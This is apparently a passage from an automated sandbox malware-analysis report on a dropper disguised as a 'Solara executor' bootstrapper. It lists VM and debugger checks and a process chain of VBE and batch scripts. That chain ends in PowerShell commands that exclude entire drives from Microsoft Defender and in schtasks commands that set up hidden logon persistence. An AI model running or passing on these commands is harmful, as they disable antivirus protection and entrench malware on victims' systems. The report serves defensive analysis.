                                    Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                    Source: BootstrapperV1.19.exe, 00000001.00000002.1951428944.00000158ACA52000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000004F.00000002.2255620960.000001F31E788000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                                    Source: Solaraexecutor.exe, 00000003.00000002.1710787237.0000000000C91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                                    Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                                    Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                                    Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                    Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                                    Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                                    Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                                    Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                                    Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                                    Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                                    Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                                    Source: Solaraexecutor.exe, 00000003.00000003.1702174965.0000000000C91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                                    Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                                    Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                                    Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                                    Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeAPI call chain: ExitProcess graph end nodegraph_3-24912
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D3F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00D3F838
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D47DEE mov eax, dword ptr fs:[00000030h]3_2_00D47DEE
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D4C030 GetProcessHeap,3_2_00D4C030
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D3F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00D3F838
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D3F9D5 SetUnhandledExceptionFilter,3_2_00D3F9D5
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D3FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00D3FBCA
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D48EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00D48EBD
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeMemory allocated: page read and write | page guardJump to behavior

                                    HIPS / PFW / Operating System Protection Evasion

                                    barindex
                                    Source: Yara matchFile source: Process Memory Space: BootstrapperV1.19.exe PID: 7152, type: MEMORYSTR
                                    Source: Yara matchFile source: \Device\ConDrv, type: DROPPED
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exe'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ELAMBKUP\SIHClient.exe'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\AppData\RuntimeBroker.exe'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ELAMBKUP\SIHClient.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\AppData\RuntimeBroker.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeProcess created: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe "C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe" Jump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeProcess created: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe "C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5sOqbfN.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet/PerfNET.exe"Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRLx" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /fJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRL" /sc ONLOGON /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /rl HIGHEST /fJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRL" /sc ONLOGON /tr "'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe'" /rl HIGHEST /fJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ELAMBKUP\SIHClient.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\AppData\RuntimeBroker.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OQZC6ToBZn.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe "C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D3F654 cpuid 3_2_00D3F654
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: GetLocaleInfoW,GetNumberFormatW,3_2_00D3AF0F
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeQueries volume information: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
